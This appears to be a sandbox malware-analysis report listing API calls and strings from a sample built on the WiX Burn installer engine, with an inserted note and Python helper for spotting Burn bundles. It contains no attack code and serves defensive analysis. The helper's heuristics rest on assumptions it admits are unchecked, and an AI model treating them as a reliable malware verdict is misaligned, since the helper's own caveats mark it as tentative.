                                                                                                                                                          • Failed to initialize COM on cache thread., xrefs: 00420C75
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeUninitialize
                                                                                                                                                          • String ID: Failed to initialize COM on cache thread.$d:\a\wix\wix\src\burn\engine\core.cpp
                                                                                                                                                          • API String ID: 3442037557-1349626878
                                                                                                                                                          • Opcode ID: 6bb0f204a4ff0df5e3a9ea3f284ff9ad9035fac9d0d34fe97f72c3172906397c
                                                                                                                                                          • Instruction ID: d897d95878bcc8b818dec8c0573d4f591cd2531601801c6189ea98bc5a72ec24
                                                                                                                                                          • Opcode Fuzzy Hash: 6bb0f204a4ff0df5e3a9ea3f284ff9ad9035fac9d0d34fe97f72c3172906397c
                                                                                                                                                          • Instruction Fuzzy Hash: 2D012872600210BBDB119F86CC85FEB7BA8EF49764F44017BFD08DA252E674A800D7A4
APIs
• SysAllocString.OLEAUT32(?), ref: 0046B439
• SysFreeString.OLEAUT32(00000000), ref: 0046B48B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: String$AllocFree
• String ID: d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed SysAllocString
• API String ID: 344208780-664205486
• Opcode ID: 876e083dd11bf42970f3cc40f6ab639e9403fa5280d61b66fb9a4784d4fb78dc
• Instruction ID: e9ac59b856ecd27d9e0170437860021c7dea19aa094fcf626687b69e084263c0
• Opcode Fuzzy Hash: 876e083dd11bf42970f3cc40f6ab639e9403fa5280d61b66fb9a4784d4fb78dc
• Instruction Fuzzy Hash: 4401D631640224B7C7216E099C88E6B3B6CEB85BB0F55406BFC08F7351EB788C81D6E9
APIs
• RegSetValueExW.ADVAPI32(?,00416EF7,004221A7,EstimatedSize,000000FF,004221A7,00000000,?,00418FB3,00000000,000003C0,00000120,004221A7,?,00000000,00000000), ref: 0046875D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: Value
• String ID: EstimatedSize$Failed to set %ls value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 3702945584-1818861729
• Opcode ID: bf7996e66cec47ba3a0c8293b24234146ad8109b4c5b6725aff94cc48cf5c51a
• Instruction ID: 031a09fe09c5347a8d1d93f1416eb3570b6e01c7379c50e5dd3e2eeff39b92ac
• Opcode Fuzzy Hash: bf7996e66cec47ba3a0c8293b24234146ad8109b4c5b6725aff94cc48cf5c51a
• Instruction Fuzzy Hash: 1BF0F47A2001197BE720160A8C09F5B7B5DEBC5BA5F15003FBB04AB2A0EA788D0186B9
APIs
• CompareStringOrdinal.KERNEL32(00000000,00000009,00000008,0000000D,00000001,00000000,00000001,?,0046C30A,00000000,000000FF,00000000,000000FF,00000000,00000001,00000014), ref: 0046C14B
• GetLastError.KERNEL32(?,0046C30A,00000000,000000FF,00000000,000000FF,00000000,00000001,00000014,00000015,00000010,00000011,0000000C,0000000D,00000008,00000009), ref: 0046C157
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CompareErrorLastOrdinalString
• String ID: Failed to compare version substrings$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\verutil.cpp
• API String ID: 2427233125-750196962
• Opcode ID: d4ceb8d12a29a96ae459c14bf8db2253b38e217b6130fa3e4011fde25a51bff2
• Instruction ID: fcba94b91296bb32f59355692457cb1f29f4f4e9961512cdc38a75da71fcf81f
• Opcode Fuzzy Hash: d4ceb8d12a29a96ae459c14bf8db2253b38e217b6130fa3e4011fde25a51bff2
• Instruction Fuzzy Hash: E0F0783368032977DB315E168C46F9B3F19EF59BA0F414022FD08BA2A2E6758C1086E4
APIs
  • Part of subcall function 0046B18E: VariantInit.OLEAUT32(?), ref: 0046B1A5
  • Part of subcall function 0046B18E: VariantClear.OLEAUT32(?), ref: 0046B2F0
  • Part of subcall function 0046B18E: SysFreeString.OLEAUT32(00000000), ref: 0046B2FB
• CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,yes,000000FF,0040955C,?,00000000,00000000,?,?,0040D285,0040955C,Hidden,?), ref: 0046B513
Strings
• yes, xrefs: 0046B505
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0046B4F4
• Failed to get attribute., xrefs: 0046B4E5
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: StringVariant$ClearCompareFreeInit
• String ID: Failed to get attribute.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$yes
• API String ID: 2896382772-3637628611
• Opcode ID: 1a0e46dee830c4ac7b467ce9d3b8e3e9e09163af709318c224243648d4e0eb11
• Instruction ID: 60d5b2e4f816f330f3f1eb8c232bc42f6b6140e510becd287faa7d1abee04a3d
• Opcode Fuzzy Hash: 1a0e46dee830c4ac7b467ce9d3b8e3e9e09163af709318c224243648d4e0eb11
• Instruction Fuzzy Hash: 5D012B31A91214BBDB10AA54CC0AFDE3624DB11739F200366F511F61D0E7784B40C7D9
APIs
• GetCurrentProcess.KERNEL32(?), ref: 0040ABAF
  • Part of subcall function 00466D48: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,0040ABBB,00000000), ref: 00466D5B
  • Part of subcall function 00466D48: GetProcAddress.KERNEL32(00000000), ref: 00466D62
  • Part of subcall function 00466D48: GetLastError.KERNEL32(?,?,?,?,0040ABBB,00000000), ref: 00466D8C
Strings
• Failed to set variant value., xrefs: 0040ABEF
• d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040AC01
• Failed to get native machine value., xrefs: 0040ABC1
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: AddressCurrentErrorHandleLastModuleProcProcess
• String ID: Failed to get native machine value.$Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
• API String ID: 896058289-294996902
• Opcode ID: 2f2444547dfbbe0eb9afca059992627b1bfdc30a1573def485e323fd564c1c20
• Instruction ID: 68a5767de22f538c8409b43f91f3398123528f6e7a194430583dfbc29119608c
• Opcode Fuzzy Hash: 2f2444547dfbbe0eb9afca059992627b1bfdc30a1573def485e323fd564c1c20
• Instruction Fuzzy Hash: 90F0C262B8432076EA22A2558C0AFDF75688F51B61F514167B908BA2C0E5B8D91083DA
APIs
• CompareStringW.KERNEL32(0000007F,00000000,?,00000003,Wix,00000003,0040951C,?,0040D49B,00000000,00000000,0040951C,00000000,00000000,0040951C,?), ref: 0040B621
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CompareString
• String ID: Attempted to insert variable with reserved prefix: %ls$Wix$d:\a\wix\wix\src\burn\engine\variable.cpp
• API String ID: 1825529933-138336430
• Opcode ID: be799b788d1fe7766c2a2fd27a5edfde35fb5454078e8eb353ce8b4f6bb1dfe9
• Instruction ID: 3c5691b2860ac69ccd7d324cc9c42fa347cfb5b87d3192ad4a16bf0051f3d5b6
• Opcode Fuzzy Hash: be799b788d1fe7766c2a2fd27a5edfde35fb5454078e8eb353ce8b4f6bb1dfe9
• Instruction Fuzzy Hash: D5F0B432780204B7D7212A45AC46FAB3F1DDB45BB4F508036FB0CB91E1837A4A2197ED
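The source-path strings recovered in the blocks above (xmlutil.cpp, regutil.cpp and verutil.cpp under wixtoolset.dutil, and burn\engine\variable.cpp) are build artifacts of the WiX Toolset's Burn bootstrapper engine, and they sit in the sample's own main module at 00400000. That suggests the analysed executable is an installer bundle whose stub code produces these function listings, with the Phorpiex behaviour coming from what the bundle carries rather than from these routines. The following Python is an added triage helper, not Joe Sandbox or WiX code: it scans a file for those exact strings (as ANSI, which is how __FILE__ lands in the binary, and as UTF-16LE as a fallback) and for a PE section named .wixburn. The section name comes from general knowledge of WiX and is not stated in this report, and the two-marker threshold for the string-only verdict is an arbitrary choice. The sample it runs on is a constructed stand-in built from minimal PE headers and the report's strings, not the real file.

```python
import struct

# Source-path strings taken from this report's "String ID" entries.
WIX_PATH_MARKERS = (
    rb"d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp",
    rb"d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp",
    rb"d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\verutil.cpp",
    rb"d:\a\wix\wix\src\burn\engine\variable.cpp",
)
# Section name Burn stubs use for their container metadata. This is an
# assumption from general WiX knowledge, not something the report states.
BURN_SECTION = b".wixburn"
# Arbitrary threshold: how many path markers count as a bundle on their own.
MIN_MARKERS = 2


def pe_section_names(data: bytes) -> list:
    """Return the section names of a PE image, or [] if the headers do not parse."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    (num_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size          # section table follows the optional header
    names = []
    for i in range(num_sections):
        off = table + 40 * i                  # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\0"))
    return names


def find_wix_markers(data: bytes) -> list:
    """Markers present as ANSI (how __FILE__ is stored) or, as a fallback, UTF-16LE."""
    found = []
    for marker in WIX_PATH_MARKERS:
        wide = marker.decode("ascii").encode("utf-16-le")
        if marker in data or wide in data:
            found.append(marker.decode("ascii"))
    return found


def classify(data: bytes) -> dict:
    """Verdict plus the evidence it rests on, so an analyst can see why."""
    markers = find_wix_markers(data)
    sections = pe_section_names(data)
    has_burn_section = BURN_SECTION in sections
    return {
        "wix_burn_bundle": has_burn_section or len(markers) >= MIN_MARKERS,
        "burn_section": has_burn_section,
        "markers": markers,
    }


def build_constructed_sample() -> bytes:
    """Constructed stand-in for a Burn stub (not a runnable executable): minimal
    MZ/PE headers, one '.wixburn' section header and the four marker strings."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader (0 keeps the stand-in short), Characteristics.
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)
    section = BURN_SECTION.ljust(8, b"\0") + b"\0" * 32
    strings = b"\0".join(WIX_PATH_MARKERS) + b"\0"
    return bytes(dos) + b"PE\0\0" + coff + section + strings


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_constructed_sample()
    print(classify(blob))
```

Run it with a file path to test a real sample; without arguments it classifies the constructed stand-in. A positive result only says "this is a Burn bundle": the next step is to pull the attached container out of the bundle and analyse the packages inside, which this helper does not attempt.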
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00454884,00000000,?,004B1DC8,?,?,?,00454A27,00000004,InitializeCriticalSectionEx,004A109C,InitializeCriticalSectionEx), ref: 004548E0
                                                                                                                                                          • GetLastError.KERNEL32(?,00454884,00000000,?,004B1DC8,?,?,?,00454A27,00000004,InitializeCriticalSectionEx,004A109C,InitializeCriticalSectionEx,00000000,?,004547A0), ref: 004548EA
                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00454912
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
APIs
• GetConsoleOutputCP.KERNEL32(83C6D434,00000000,00000000,?), ref: 00461448
  • Part of subcall function 0045CDFB: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004610BB,?,00000000,-00000008), ref: 0045CE5C
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0046169A
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004616E0
• GetLastError.KERNEL32 ref: 00461783
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
APIs
• EnterCriticalSection.KERNEL32(7FFFFFFE,00000000,?,?,00409D1C,00000000,?,00419CB9,?,00000001,00000000,?,00000002,-00000001,00000008,?), ref: 0040CC2A
• LeaveCriticalSection.KERNEL32(7FFFFFFE,7FFFFFFE,?,00000000,?,?,00409D1C,00000000,?,00419CB9,?,00000001,00000000,?,00000002,-00000001), ref: 0040CC89
Strings
• d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040CC6C
• Failed to get visibility of variable: %ls, xrefs: 0040CC5A
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Failed to get visibility of variable: %ls$d:\a\wix\wix\src\burn\engine\variable.cpp
• API String ID: 3168844106-4112153722
APIs
• WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00462C60,00000000,00000001,?,?,?,004617D7,?,00000000,00000000), ref: 00463B0E
• GetLastError.KERNEL32(?,00462C60,00000000,00000001,?,?,?,004617D7,?,00000000,00000000,?,?,?,00461D7A,00000000), ref: 00463B1A
  • Part of subcall function 00463AE0: CloseHandle.KERNEL32(FFFFFFFE,00463B2A,?,00462C60,00000000,00000001,?,?,?,004617D7,?,00000000,00000000,?,?), ref: 00463AF0
• ___initconout.LIBCMT ref: 00463B2A
  • Part of subcall function 00463AA1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00463AD0,00462C4D,?,?,004617D7,?,00000000,00000000,?), ref: 00463AB4
• WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00462C60,00000000,00000001,?,?,?,004617D7,?,00000000,00000000,?), ref: 00463B3F
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
APIs
• EnterCriticalSection.KERNEL32(?,?,00000000,?,00437409,?,?), ref: 0046EC0B
• LeaveCriticalSection.KERNEL32(?,?,?,?,00437409,?,?), ref: 0046EC3E
Strings
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pipeutil.cpp, xrefs: 0046EC30
• Failed to read message from RPC pipe., xrefs: 0046EC21
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Failed to read message from RPC pipe.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pipeutil.cpp
• API String ID: 3168844106-603814421
APIs
• EnterCriticalSection.KERNEL32(?), ref: 004084E9
• SetEvent.KERNEL32(?,?,?,00000000), ref: 00408506
• GetLastError.KERNEL32 ref: 00408510
• LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 00408517
Similarity
• API ID: CriticalSection$EnterErrorEventLastLeave
• String ID:
• API String ID: 2851136515-0
APIs
  • Part of subcall function 004613E5: GetConsoleOutputCP.KERNEL32(83C6D434,00000000,00000000,?), ref: 00461448
• WriteFile.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000001,?,0045E552,?), ref: 00461E1D
• GetLastError.KERNEL32(?,0045E552,?,?,00000000,00000000,00000028), ref: 00461E27
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Similarity
• API ID: ConsoleErrorFileLastOutputWrite
• String ID: RE
• API String ID: 2915228174-2469586463
APIs
• EncodePointer.KERNEL32(00000000,?), ref: 00455424
Strings
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
APIs
Strings
• d:\a\wix\wix\src\burn\engine\variant.cpp, xrefs: 00438C32
• Failed to copy variant value., xrefs: 00438C20
Similarity
• API ID: _memcpy_s
• String ID: Failed to copy variant value.$d:\a\wix\wix\src\burn\engine\variant.cpp
• API String ID: 2001391462-2667412016
Strings
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\memutil.cpp, xrefs: 00407603
• Failed to resize array while inserting items, xrefs: 004075F4
Similarity
• API ID:
• String ID: Failed to resize array while inserting items$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\memutil.cpp
• API String ID: 0-1147601295
APIs
  • Part of subcall function 00467B72: RegOpenKeyExW.KERNELBASE(?,00467B6E,00000000,00000000,00000003,00000000,?,?,00470A51,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 00467B9D
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,000001D0,?,00020019,?,00000000,00000000,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,?,?), ref: 004716DA
Strings
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 0047167C
• Failed to open uninstall key for potential related bundle: %ls, xrefs: 0047166D
Similarity
• API ID: CloseOpen
• String ID: Failed to open uninstall key for potential related bundle: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\butil.cpp
• API String ID: 47109696-986361098
APIs
• RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000000,00000000,00000002,00000002,?,00419AC6,00000008,?), ref: 00419534
Strings
• Logging, xrefs: 004194C1
• SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 004194AA
Similarity
• API ID: Close
• String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer
• API String ID: 3535843008-387823766
APIs
• RegCreateKeyExW.ADVAPI32(?,?,004674A6,00020006,?,?,00000000,00000000,00000000,00417031,00000000,00000000,?,00417031,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce), ref: 0046750C
Strings
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Create
                                                                                                                                                          • String ID: Failed to create registry key.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 2289755597-1991184446
                                                                                                                                                          • Opcode ID: fd62a38d7ac18555c623717f884fee54a2acd0e2549f66c753a69d7375437688
                                                                                                                                                          • Instruction ID: f8b7341b8a0ba89e19f580a65fb1f76231f5a355409764717bc5ec7d8d17614e
                                                                                                                                                          • Opcode Fuzzy Hash: fd62a38d7ac18555c623717f884fee54a2acd0e2549f66c753a69d7375437688
                                                                                                                                                          • Instruction Fuzzy Hash: 4E112976204219BBDB108E169C05D9F3BADDBC5798F01006ABD05E7250F639CD11D679
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00405685: SetFilePointerEx.KERNEL32(?,?,?,?,?,00000000,?,?,?,0041BDC6,00000000,00000000,00000000,00000000,00000000), ref: 004056A3
                                                                                                                                                            • Part of subcall function 00405685: GetLastError.KERNEL32(?,?,?,0041BDC6,00000000,00000000,00000000,00000000,00000000,?,00000001,?,WixBundleOriginalSource,?,?,?), ref: 004056AD
                                                                                                                                                          • WriteFile.KERNEL32(000000FF,00000008,00000008,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,?,?,004728E0), ref: 0047281B
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to seek to start point in file., xrefs: 004727EA
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp, xrefs: 004727F9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$ErrorLastPointerWrite
                                                                                                                                                          • String ID: Failed to seek to start point in file.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                          • API String ID: 972348794-2670695857
                                                                                                                                                          • Opcode ID: 0b37008bc0b309e7e87d7cc5a2eaf11378d3a3a596b4d9a96f1a2c029e34167a
                                                                                                                                                          • Instruction ID: d966188904647f6cc134663d083c092f28062d582b01535048e2e1e7e43fbf10
                                                                                                                                                          • Opcode Fuzzy Hash: 0b37008bc0b309e7e87d7cc5a2eaf11378d3a3a596b4d9a96f1a2c029e34167a
                                                                                                                                                          • Instruction Fuzzy Hash: E0010871640209BFD7149B54CD4AFEA776CEB14330F50823BF804E6190D7B9AD10C6E4
                                                                                                                                                          APIs
                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,00468681,00000000,00000214,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,?,00416615), ref: 00467810
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: QueryValue
                                                                                                                                                          • String ID: Failed to read registry value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
